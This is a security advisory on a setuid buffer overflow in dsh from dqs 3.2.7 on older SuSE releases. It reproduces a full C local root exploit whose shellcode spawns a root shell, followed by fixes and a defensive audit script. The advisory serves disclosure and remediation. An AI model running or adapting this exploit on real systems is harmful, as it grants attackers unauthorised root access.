COMMAND
dqs
SYSTEMS AFFECTED
dqs 3.2.7 (SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7 by default)
PROBLEM
'dex dex' found the following. He found a buffer overflow
vulnerability in /usr/bin/dsh (from the dqs 3.2.7 package).
If a long string is given as the first argument, the program
crashes with a SIGSEGV signal. SuSE 6.3, 6.4 and 7.0 ship dqs 3.2.7
by default and are therefore vulnerable; other distributions may be too.
The exploit can be found at
www.raza-mexicana.org/programas/programas/qsexp.c
and is reproduced here:
/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh(dqs 3.2.7 package) local root exploit. */
/* SuSE 6.3, 6.4, and 7.0 are vunerable. */
/* dex@raza-mexicana.org <> http://www.raza-mexicana.org */
/* Greetings: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal, */
/* megaflop and all of raza. Too lazy to write them all out XD. */
/* Special greetings to the little Spaniard (NOP) :P, you know why. */
/* */
/* - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */
/********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFSIZE 2772
#define OFFSET 0
#define ALIGN 0
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
static char code[]= /* stolen from mount.c :P */
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int offset=OFFSET;
int buffsize=BUFFSIZE;
int align=ALIGN;
if (argc > 1 ) offset = atoi(argv[1]);
if (argc > 2 ) align = atoi(argv[2]);
if (argc > 3 ) buffsize = atoi(argv[3]);
buffer = (char *)malloc(buffsize + 8);
addr = get_sp() - offset;
for(i = 0; i < buffsize; i += 4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffsize - 8] = addr;
*(long *)&buffer[buffsize - 4] = addr;
memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Starting....\n");
execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL);
}
SOLUTION
SuSE confirmed this vulnerability and that dqs has the setuid bit
on the file /usr/bin/dsh, but the package (as a package in the
clustering series) is not installed by default.
The fix (to remove the suid bit) is correct. If you have selected
to set the variable PERMISSION_SECURITY in /etc/rc.config to
"secure local" in SuSE-7.1 (recommended for security-enhanced
settings), you are not vulnerable. On SuSE-7.1, in addition to
the chmod command below, change the files /etc/permissions.*, too,
to reflect the removed suid bit.
If you do not need the dqs package, simply remove it with the
command rpm -e dqs.
Of course, SuSE will provide update packages as soon as possible.
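The remediation above, as an added example that is not part of the advisory or SuSE's own tooling: a small POSIX sh audit that checks whether the dqs 3.2.7 dsh binary is present with its setuid bit, optionally applies the chmod fix, and lists any /etc/permissions.* entries that would re-grant the bit (the path /usr/bin/dsh and the permissions files are the ones named above; the DSH_PATH override is an assumption for testing).

```shell
#!/bin/sh
# Added example (not from the advisory): audit/remediate the setuid dsh
# from dqs 3.2.7. DSH_PATH defaults to the path the advisory names.
DSH_PATH="${DSH_PATH:-/usr/bin/dsh}"

# has_setuid FILE: succeed (0) if FILE is a regular file with the setuid bit.
# "find -perm -4000" is POSIX; -prune keeps find from descending a directory.
has_setuid() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" -prune -type f -perm -4000 2>/dev/null)" ]
}

# remove_setuid FILE: the fix SuSE confirmed as correct (drop the suid bit).
remove_setuid() {
    chmod u-s "$1"
}

# permissions_entries FILE: /etc/permissions.* lines that still assign a
# setuid mode (4xxx/6xxx...) to FILE. On SuSE-7.1 these must be edited too,
# or reapplying the permissions files restores the bit.
permissions_entries() {
    grep "^$1[[:space:]]" /etc/permissions.* 2>/dev/null |
        grep -E '[[:space:]][4-7][0-7]{3}[[:space:]]*$'
}

# audit_dsh [--fix]: print a status line; return 0 when the host is not
# exposed (binary absent or not setuid), 1 when the setuid dsh is present.
audit_dsh() {
    if ! [ -e "$DSH_PATH" ]; then
        echo "[ok] $DSH_PATH not present (dqs not installed, or removed with rpm -e dqs)"
        return 0
    fi
    if has_setuid "$DSH_PATH"; then
        echo "[!!] $DSH_PATH is setuid: dqs 3.2.7 overflow reachable by local users"
        if [ "${1:-}" = "--fix" ]; then
            remove_setuid "$DSH_PATH" && echo "[fix] setuid bit removed from $DSH_PATH"
            permissions_entries "$DSH_PATH" | sed 's/^/[todo] edit entry: /'
            return 0
        fi
        return 1
    fi
    echo "[ok] $DSH_PATH present without setuid bit"
    return 0
}

# Usage: sh audit_dsh.sh --run [--fix]
if [ "${1:-}" = "--run" ]; then
    audit_dsh "${2:-}"
fi
```

Run it as root to apply the fix; without --fix it only reports, so it is safe to drop into a periodic compliance check.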
The original publisher (SCRI, Florida State University) is no
longer maintaining DQS or employing the original author, but has
also refused to relax the distribution restrictions, making it
difficult to form a new developer community.